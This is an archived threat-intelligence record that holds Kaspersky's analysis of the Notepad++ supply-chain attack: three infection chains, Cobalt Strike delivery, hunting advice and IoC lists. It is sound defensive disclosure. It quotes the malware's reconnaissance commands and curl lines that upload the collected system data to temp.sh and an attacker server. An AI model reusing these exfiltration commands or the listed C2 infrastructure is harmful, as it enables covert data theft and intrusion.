{
	"id": "3229d7cb-0f2e-407d-b2f5-8e122aa7dd92",
	"created_at": "2026-04-06T00:21:50.813666Z",
	"updated_at": "2026-04-10T03:19:59.796234Z",
	"deleted_at": null,
	"sha1_hash": "b4e81b0030179d385af7e38ed98cb26c162b67b4",
	"title": "The Notepad++ supply chain attack — unnoticed execution chains and new IoCs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 773915,
	"plain_text": "The Notepad++ supply chain attack — unnoticed execution chains\r\nand new IoCs\r\nBy Georgy Kucherin\r\nPublished: 2026-02-03 · Archived: 2026-04-05 15:17:50 UTC\r\nUPD 11.02.2026: added recommendations on how to use the Notepad++ supply chain attack rules package in our\r\nSIEM system.\r\nIntroduction\r\nOn February 2, 2026, the developers of Notepad++, a text editor popular among developers, published a statement\r\nclaiming that the update infrastructure of Notepad++ had been compromised. According to the statement, this was\r\ndue to a hosting provider-level incident, which occurred from June to September 2025. However, attackers had\r\nbeen able to retain access to internal services until December 2025.\r\nMultiple execution chains and payloads\r\nHaving checked our telemetry related to this incident, we were amazed to find out how different and unique the\r\nexecution chains used in this supply chain attack were. We identified that over the course of four months, from\r\nJuly to October 2025, attackers who had compromised Notepad++ had been constantly rotating C2 server\r\naddresses used for distributing malicious updates, the downloaders used for implant delivery, as well as the final\r\npayloads.\r\nWe observed three different infection chains overall, designed to attack about a dozen machines, belonging to:\r\nIndividuals located in Vietnam, El Salvador, and Australia;\r\nA government organization located in the Philippines;\r\nA financial organization located in El Salvador;\r\nAn IT service provider organization located in Vietnam.\r\nDespite the variety of payloads observed, Kaspersky solutions were able to block the identified attacks as they\r\noccurred.\r\nIn this article, we describe the variety of the infection chains we observed in the Notepad++ supply chain attack,\r\nas well as provide numerous previously unpublished IoCs related to it.\r\nChain #1: late July and early August 2025\r\nWe observed attackers deploying a malicious 
Notepad++ update for the first time in late July 2025. It was hosted at\r\nhttp://45.76.155[.]202/update/update.exe. Notably, the first scan of this URL on the VirusTotal platform occurred\r\nin late September, by a user from Taiwan.\r\nhttps://securelist.com/notepad-supply-chain-attack/118708/\r\nPage 1 of 11\n\nThe update.exe file downloaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was\r\nlaunched by the legitimate Notepad++ updater process, GUP.exe. This file turned out to be an NSIS installer about\r\n1 MB in size. When started, it sends a heartbeat containing system information to the attackers. This is done\r\nthrough the following steps:\r\n1. The file creates a directory named %appdata%\\ProShow and sets it as the current directory;\r\n2. It executes the shell command cmd /c whoami\u0026\u0026tasklist \u003e 1.txt, thus creating a file with the shell\r\ncommand execution results in the %appdata%\\ProShow directory;\r\n3. Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F\r\n\"file=@1.txt\" -s https://temp.sh/upload command;\r\n4. Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent\r\n\"https://temp.sh/ZMRKV/1.txt\" -s http://45.76.155[.]202 shell command. As can be observed, the\r\nuploaded file URL is transferred inside the user agent.\r\nNotably, the same behavior of malicious Notepad++ updates, specifically the launch of shell commands and the\r\nuse of the temp[.]sh website for file uploading, was described on the Notepad++ community forums by a user\r\nnamed soft-parsley.\r\nAfter sending system information, the update.exe file executes the second-stage payload. 
To do that, it performs\r\nthe following actions:\r\nDrops the following files to the %appdata%\\ProShow directory:\r\nProShow.exe (SHA1: defb05d5a91e4920c9e22de2d81c5dc9b95a9a7c)\r\ndefscr (SHA1: 259cd3542dea998c57f67ffdd4543ab836e3d2a3)\r\nif.dnt (SHA1: 46654a7ad6bc809b623c51938954de48e27a5618)\r\nproshow.crs\r\nproshow.phd\r\nproshow_e.bmp (SHA1: 9df6ecc47b192260826c247bf8d40384aa6e6fd6)\r\nload (SHA1: 06a6a5a39193075734a32e0235bde0e979c27228)\r\nExecutes the dropped ProShow.exe file.\r\nThe ProShow.exe file being launched is legitimate ProShow software, which is abused to launch a malicious\r\npayload. Normally, when threat actors aim to execute a malicious payload inside a legitimate process, they resort\r\nto the DLL sideloading technique. However, this time attackers decided to avoid using it — likely due to how\r\nmuch attention this technique receives nowadays. Instead, they abused an old, known vulnerability in the\r\nProShow software, which dates back to the early 2010s. The dropped file named load contains an exploit payload,\r\nwhich is triggered when the ProShow.exe file is launched. It is worth noting that, apart from this payload, all\r\nfiles in the %appdata%\\ProShow directory are legitimate.\r\nAnalysis of the exploit payload revealed that it contained two shellcodes: one at the very start and the other one in\r\nthe middle of the file. The shellcode located at the start of the file contained a set of meaningless instructions and\r\nwas not designed to be executed — rather, attackers used it as the exploit padding bytes. It is likely that, by using\r\na fake shellcode for padding bytes instead of something else (e.g., a sequence of 0x41 characters or random\r\nbytes), attackers aimed to confuse researchers and automated analysis systems.\r\nThe second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is\r\nstarted. 
It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL\r\nhttps://45.77.31[.]210/users/admin (user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n(KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36) and launches it.\r\nThe Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance,\r\nit uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL\r\nhttps://45.77.31[.]210/api/FileUpload/submit.\r\nLater on, in early August 2025, we observed attackers using the same download URL for the update.exe files\r\n(observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same execution chain for\r\ndelivery of Cobalt Strike Beacon via malicious Notepad++ updates. However, we noted the following differences:\r\nIn the Metasploit downloader payload, the URL for downloading Cobalt Strike Beacon was set to\r\nhttps://cdncheck.it[.]com/users/admin;\r\nThe Cobalt Strike C2 server URLs were set to https://cdncheck.it[.]com/api/update/v1 and\r\nhttps://cdncheck.it[.]com/api/Metadata/submit.\r\nWe have not seen any further infections leveraging chain #1 since early August 2025.\r\nChain #2: mid- and late September 2025\r\nA month and a half after malicious update detections ceased, we observed attackers resuming deployment of these\r\nupdates in the middle of September 2025, using another infection chain. The malicious update was still being\r\ndistributed from the URL http://45.76.155[.]202/update/update.exe, and the file downloaded from it (SHA1 hash:\r\n573549869e84544e3ef253bdba79851dcde4963a) was an NSIS installer as well. However, its file size was now\r\nabout 140 KB. 
Again, this file performed two actions:\r\nObtained system information by executing a shell command and uploading its execution results to\r\ntemp[.]sh;\r\nDropped a next-stage payload on disk and launched it.\r\nRegarding system information, attackers made the following changes to how it was collected:\r\nThey changed the working directory to %APPDATA%\\Adobe\\Scripts;\r\nThey started collecting more system information details, changing the shell command being executed to\r\ncmd /c \"whoami\u0026\u0026tasklist\u0026\u0026systeminfo\u0026\u0026netstat -ano\" \u003e a.txt.\r\nThe created a.txt file was, just as in the case of chain #1, uploaded to the temp[.]sh website through curl, with\r\nthe obtained temp[.]sh URL being transferred to the same http://45.76.155[.]202/list endpoint, inside the User-Agent header.\r\nAs for the next-stage payload, it was changed completely. The NSIS installer was configured to drop the following\r\nfiles into the %APPDATA%\\Adobe\\Scripts directory:\r\nalien.dll (SHA1: 6444dab57d93ce987c22da66b3706d5d7fc226da);\r\nlua5.1.dll (SHA1: 2ab0758dda4e71aee6f4c8e4c0265a796518f07d);\r\nscript.exe (SHA1: bf996a709835c0c16cce1015e6d44fc95e08a38a);\r\nalien.ini (SHA1: ca4b6fe0c69472cd3d63b212eb805b7f65710d33).\r\nNext, it executes the following shell command to launch the script.exe file:\r\n%APPDATA%\\Adobe\\Scripts\\script.exe %APPDATA%\\Adobe\\Scripts\\alien.ini.\r\nAll of the files in the %APPDATA%\\Adobe\\Scripts directory, except for alien.ini, are legitimate and related to\r\nthe Lua interpreter. As such, the previously mentioned command is used by attackers to launch a compiled Lua\r\nscript, located in the alien.ini file. 
Below is a screenshot of its decompilation:\r\nAs we can see, this small script is used for placing shellcode inside executable memory and then launching it\r\nthrough the EnumWindowStationsW API function.\r\nThe launched shellcode is, just as in the case of chain #1, a Metasploit downloader, which downloads a Cobalt Strike\r\nBeacon payload, again in the form of a shellcode, from the URL https://cdncheck.it[.]com/users/admin.\r\nThe Cobalt Strike payload contains the C2 server URLs that slightly differ from the ones seen previously:\r\nhttps://cdncheck.it[.]com/api/getInfo/v1 and https://cdncheck.it[.]com/api/FileUpload/submit.\r\nAttacks involving chain #2 continued until the end of September, when we observed two more malicious\r\nupdate.exe files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt\r\nStrike Beacon payload delivered through it was configured to use the same URLs observed in mid-September;\r\nhowever, attackers changed the way system information was collected. Specifically, attackers split the single shell\r\ncommand they used for this (cmd /c \"whoami\u0026\u0026tasklist\u0026\u0026systeminfo\u0026\u0026netstat -ano\" \u003e a.txt) into multiple\r\ncommands:\r\ncmd /c whoami \u003e\u003e a.txt\r\ncmd /c tasklist \u003e\u003e a.txt\r\ncmd /c systeminfo \u003e\u003e a.txt\r\ncmd /c netstat -ano \u003e\u003e a.txt\r\nNotably, the same sequence of commands was previously documented by the user soft-parsley on the Notepad++\r\ncommunity forums.\r\nThe other update.exe file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. 
By using it,\r\nattackers performed the following:\r\nChanged the system information upload URL to https://self-dns.it[.]com/list;\r\nChanged the user agent used in HTTP requests to Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36;\r\nChanged the URL used by the Metasploit downloader to https://safe-dns.it[.]com/help/Get-Start;\r\nChanged the Cobalt Strike Beacon C2 server URLs to https://safe-dns.it[.]com/resolve and https://safe-dns.it[.]com/dns-query.\r\nChain #3: October 2025\r\nIn early October 2025, the attackers changed the infection chain once again. They also changed the C2 server for\r\ndistributing malicious updates, with the observed update URL being http://45.32.144[.]255/update/update.exe. The\r\npayload downloaded (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) was still an NSIS installer; however,\r\nunlike in the case of chains 1 and 2, this installer did not include the system information sending functionality. It\r\nsimply dropped the following files to the %appdata%\\Bluetooth\\ directory:\r\nBluetoothService.exe, a legitimate executable (SHA1: 21a942273c14e4b9d3faa58e4de1fd4d5014a1ed);\r\nlog.dll, a malicious DLL (SHA1: f7910d943a013eede24ac89d6388c1b98f8b3717);\r\nBluetoothService, an encrypted shellcode (SHA1: 7e0790226ea461bcc9ecd4be3c315ace41e1c122).\r\nThis execution chain relies on the sideloading of the log.dll file, which is responsible for launching the\r\nencrypted BluetoothService shellcode into the BluetoothService.exe process. Notably, such execution chains\r\nare commonly used by Chinese-speaking threat actors. This particular execution chain has already been described\r\nby Rapid7, and the final payload observed in it is the custom Chrysalis backdoor.\r\nUnlike the previous chains, chain #3 does not load a Cobalt Strike Beacon directly. 
However, in their article\r\nRapid7 claim that they additionally observed a Cobalt Strike Beacon payload being deployed to the\r\nC:\\ProgramData\\USOShared folder, while conducting incident response on one of the machines infected by the\r\nNotepad++ supply chain attack. Whilst Rapid7 does not detail how this file was dropped to the victim machine,\r\nwe can highlight the following similarities between that Beacon payload and the Beacon payloads observed in\r\nchains #1 and #2:\r\n1. In both cases, Beacons are loaded through a Metasploit downloader shellcode, with similar URLs used\r\n(api.wiresguard.com/users/admin for the Rapid7 payload, cdncheck.it.com/users/admin and\r\nhttp://45.77.31[.]210/users/admin for chain #1 and chain #2 payloads);\r\n2. The Beacon configurations are encrypted with the XOR key CRAZY;\r\n3. Similar C2 server URLs are used for Cobalt Strike Beacon communications (i.e.\r\napi.wiresguard.com/api/FileUpload/submit for the Rapid7 payload and\r\nhttps://45.77.31[.]210/api/FileUpload/submit for the chain #1 payload).\r\nReturn of chain #2 and changes in URLs: October 2025\r\nIn mid-October 2025, we observed attackers resuming deployments of the chain #2 payload (SHA1 hash:\r\n821c0cafb2aab0f063ef7e313f64313fc81d46cd) using yet another URL: http://95.179.213[.]0/update/update.exe.\r\nStill, this payload used the previously mentioned self-dns.it[.]com and safe-dns.it[.]com domain names for system\r\ninformation uploading, Metasploit downloader and Cobalt Strike Beacon communications.\r\nFurther, in late October 2025, we observed attackers starting to change the URLs used for malicious update deliveries.\r\nSpecifically, attackers started using the following URLs:\r\nhttp://95.179.213[.]0/update/install.exe;\r\nhttp://95.179.213[.]0/update/update.exe;\r\nhttp://95.179.213[.]0/update/AutoUpdater.exe.\r\nWe didn’t observe any new payloads deployed from these URLs — they 
made use of both the chain #2 and chain #3\r\nexecution chains. Finally, we have not seen any payloads deployed since November 2025.\r\nConclusion\r\nNotepad++ is a text editor used by numerous developers. As such, the ability to control update servers of this\r\nsoftware gave the attackers a unique possibility to break into machines of high-profile organizations around the\r\nworld. The attackers made an effort to avoid losing access to this infection vector — they were spreading the\r\nmalicious implants in a targeted manner, and they were skilled enough to drastically change the infection chains\r\nabout once a month. Whilst we identified three distinct infection chains during our investigation, we would not be\r\nsurprised to see more of them in use. To sum up our findings, here is the overall timeline of the infection chains\r\nthat we identified:\r\nThe variety of infection chains makes detection of the Notepad++ supply chain attack quite a difficult, and at the\r\nsame time creative, task. We would like to propose the following methods, from generic to specific, to hunt down\r\ntraces of this attack:\r\nCheck systems for deployments of NSIS installers, which were used in all three observed execution chains.\r\nFor example, this can be done by looking for logs related to creations of a %localappdata%\\Temp\\ns.tmp\r\ndirectory, made by NSIS installers at runtime. Make sure to investigate the origins of each identified NSIS\r\ninstaller to avoid false positives;\r\nCheck network traffic logs for DNS resolutions of the temp[.]sh domain, which is unusual to observe in\r\ncorporate environments. 
Also, it is beneficial to conduct a check for raw HTTP traffic requests that have a\r\ntemp[.]sh URL embedded in the user agent — both these steps will make it possible to detect chain #1 and\r\nchain #2 deployments;\r\nCheck systems for launches of malicious shell commands referenced in the article, such as whoami,\r\ntasklist, systeminfo and netstat -ano;\r\nUse the specific IoCs listed below to identify known malicious domains and files.\r\nDetection by Kaspersky solutions\r\nKaspersky security solutions, such as Kaspersky Next Endpoint Detection and Response Expert, successfully\r\ndetect malicious activity in the attacks described above.\r\nLet’s take a closer look at Kaspersky Next EDR Expert.\r\nOne way to detect the described malicious activity is to monitor requests to LOLC2 (Living-Off-the-Land C2)\r\nservices, which include temp[.]sh. Attackers use such services as intermediate control or delivery points for\r\nmalicious payloads, masking C2 communication as legitimate web traffic. KEDR Expert detects this activity using\r\nthe lolc2_connection_activity_network rule.\r\nIn addition, the described activity can be detected through the execution of typical local reconnaissance commands that\r\nattackers launch in the early stages of an attack after gaining access to the system. These commands allow the\r\nattacker to quickly obtain information about the environment, access rights, running processes, and network\r\nconnections to plan further actions. 
KEDR Expert detects such activity using the following rules:\r\nsystem_owner_user_discovery, using_whoami_to_check_that_current_user_is_admin,\r\nsystem_information_discovery_win, system_network_connections_discovery_via_standard_windows_utilities.\r\nIn this case, a clear sign of malicious activity is gaining persistence through the autorun mechanism via the\r\nWindows registry, specifically the Run key, which ensures that programs start automatically when the user logs in.\r\nKEDR Expert detects this activity using the temporary_folder_in_registry_autorun rule.\r\nTo protect companies that use our Kaspersky SIEM system, we have prepared a set of correlation rules that help\r\ndetect such malicious activity. These rules are already available for customers to download from the SIEM\r\nrepository; the package name is [OOTB] Notepad++ supply chain attack package – ENG.\r\nThe Notepad++ supply chain attack package contains rules that can be divided into two groups based on their\r\ndetection capabilities:\r\n1. Indicators of compromise:\r\n1.1 malicious URLs used to extract information from the targeted infrastructure;\r\n1.2 malicious file names and hashes that were detected in this campaign.\r\n2. Suspicious activity on the host:\r\n2.1 unusual command lines specific to these attacks;\r\n2.2 suspicious network activity from Notepad++ processes and an abnormal process tree;\r\n2.3 traces of data collection, e.g. single-character file names.\r\nSome rules may need to be adjusted if they trigger on legitimate activity, such as administrators’ or inventory\r\nagents’ actions.\r\nWe also recommend using the rules from the Notepad++ supply chain attack package for retrospective analysis\r\n(threat hunting). 
Recommended analysis period: from September 2025.\r\nFor the detection rules to work correctly, you need to make sure that events from Windows systems are received in\r\nfull, including events 4688 (with command line logging enabled), 5136 (packet filtering), 4663 (access to objects,\r\nespecially files), etc.\r\nIndicators of compromise\r\nURLs used for malicious Notepad++ update deployments\r\nhttp://45.76.155[.]202/update/update.exe\r\nhttp://45.32.144[.]255/update/update.exe\r\nhttp://95.179.213[.]0/update/update.exe\r\nhttp://95.179.213[.]0/update/install.exe\r\nhttp://95.179.213[.]0/update/AutoUpdater.exe\r\nSystem information upload URLs\r\nhttp://45.76.155[.]202/list\r\nhttps://self-dns.it[.]com/list\r\nURLs used by Metasploit downloaders to deploy Cobalt Strike beacons\r\nhttps://45.77.31[.]210/users/admin\r\nhttps://cdncheck.it[.]com/users/admin\r\nhttps://safe-dns.it[.]com/help/Get-Start\r\nURLs used by Cobalt Strike Beacons delivered by malicious Notepad++ updaters\r\nhttps://45.77.31[.]210/api/update/v1\r\nhttps://45.77.31[.]210/api/FileUpload/submit\r\nhttps://cdncheck.it[.]com/api/update/v1\r\nhttps://cdncheck.it[.]com/api/Metadata/submit\r\nhttps://cdncheck.it[.]com/api/getInfo/v1\r\nhttps://cdncheck.it[.]com/api/FileUpload/submit\r\nhttps://safe-dns.it[.]com/resolve\r\nhttps://safe-dns.it[.]com/dns-query\r\nURLs used by the Chrysalis backdoor and the Cobalt Strike Beacon payloads associated with it, as previously\r\nidentified by Rapid7\r\nhttps://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821\r\nhttps://api.wiresguard[.]com/update/v1\r\nhttps://api.wiresguard[.]com/api/FileUpload/submit\r\nURLs related to Cobalt Strike Beacons uploaded to multiscanners, as previously identified by 
Rapid7\r\nhttp://59.110.7[.]32:8880/uffhxpSy\r\nhttp://59.110.7[.]32:8880/api/getBasicInfo/v1\r\nhttp://59.110.7[.]32:8880/api/Metadata/submit\r\nhttp://124.222.137[.]114:9999/3yZR31VK\r\nhttp://124.222.137[.]114:9999/api/updateStatus/v1\r\nhttp://124.222.137[.]114:9999/api/Info/submit\r\nhttps://api.wiresguard[.]com/users/system\r\nhttps://api.wiresguard[.]com/api/getInfo/v1\r\nMalicious update.exe hashes\r\n8e6e505438c21f3d281e1cc257abdbf7223b7f5a\r\n90e677d7ff5844407b9c073e3b7e896e078e11cd\r\n573549869e84544e3ef253bdba79851dcde4963a\r\n13179c8f19fbf3d8473c49983a199e6cb4f318f0\r\n4c9aac447bf732acc97992290aa7a187b967ee2c\r\n821c0cafb2aab0f063ef7e313f64313fc81d46cd\r\nHashes of malicious auxiliary files\r\n06a6a5a39193075734a32e0235bde0e979c27228 — load\r\n9c3ba38890ed984a25abb6a094b5dbf052f22fa7 — load\r\nca4b6fe0c69472cd3d63b212eb805b7f65710d33 — alien.ini\r\n0d0f315fd8cf408a483f8e2dd1e69422629ed9fd — alien.ini\r\n2a476cfb85fbf012fdbe63a37642c11afa5cf020 — alien.ini\r\nMalicious file hashes, as previously identified by Rapid7\r\nd7ffd7b588880cf61b603346a3557e7cce648c93\r\n94dffa9de5b665dc51bc36e2693b8a3a0a4cc6b8\r\n21a942273c14e4b9d3faa58e4de1fd4d5014a1ed\r\n7e0790226ea461bcc9ecd4be3c315ace41e1c122\r\nf7910d943a013eede24ac89d6388c1b98f8b3717\r\n73d9d0139eaf89b7df34ceeb60e5f8c7cd2463bf\r\nbd4915b3597942d88f319740a9b803cc51585c4a\r\nc68d09dd50e357fd3de17a70b7724f8949441d77\r\n813ace987a61af909c053607635489ee984534f4\r\n9fbf2195dee991b1e5a727fd51391dcc2d7a4b16\r\n07d2a01e1dc94d59d5ca3bdf0c7848553ae91a51\r\n3090ecf034337857f786084fb14e63354e271c5d\r\nd0662eadbe5ba92acbd3485d8187112543bcfbf5\r\n9c0eff4deeb626730ad6a05c85eb138df48372ce\r\nMalicious file paths\r\n%appdata%\\ProShow\\load\r\n%appdata%\\Adobe\\Scripts\\alien.ini\r\n%appdata%\\Bluetooth\\BluetoothService\r\nSource: 
https://securelist.com/notepad-supply-chain-attack/118708/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securelist.com/notepad-supply-chain-attack/118708/"
	],
	"report_names": [
		"118708"
	],
	"threat_actors": [],
	"ts_created_at": 1775434910,
	"ts_updated_at": 1775791199,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b4e81b0030179d385af7e38ed98cb26c162b67b4.pdf",
		"text": "https://archive.orkl.eu/b4e81b0030179d385af7e38ed98cb26c162b67b4.txt",
		"img": "https://archive.orkl.eu/b4e81b0030179d385af7e38ed98cb26c162b67b4.jpg"
	}
}